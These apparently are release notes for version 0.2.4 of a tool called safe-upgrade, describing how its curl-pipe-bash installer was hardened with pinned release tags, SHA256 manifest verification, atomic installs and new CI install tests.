v0.2.4 — harden the script installer

v0.2.4 — harden the script installer

The curl | bash script installer now pins to an immutable release tag and
verifies every file against a published SHA256 manifest before anything is
installed — bringing the script route in line with the integrity guarantees the
Homebrew tap route already provides.

Changed

• Pinned, not moving. Downloads come from an immutable release tag, never the
  main branch — a curl | bash run always gets exactly one published release.
• Verify before install. A published SHA256SUMS manifest drives the release
  file set; every file is staged and checksum-verified before anything lands in
  your Homebrew bin. A truncated, tampered, or missing file aborts the whole
  install — no partial state.
• Atomic, same-filesystem swap and a fail-closed completeness floor so a
  truncated manifest can't yield a "successful" partial install.

Fixed

• Single-source version. pyproject.toml is realigned with the VERSION
  file, with CI keeping them — and the installer's pinned tag — in lockstep.

Tests / CI

• A new hermetic end-to-end install smoke runs the real installer over a local
  server in CI on Linux (bash 5) and macOS (bash 3.2) — the script-install route
  is exercised in CI for the first time. Full suite: 151 passing.

Trust model: the manifest and files travel the same TLS channel, so the
checksums are defense-in-depth (transfer integrity + tag immutability) on top of
HTTPS, not a replacement for it. The Homebrew tap route was already immutable
and is unaffected — brew install sharkyger/tap/safe-upgrade.

See CHANGELOG.md for full history.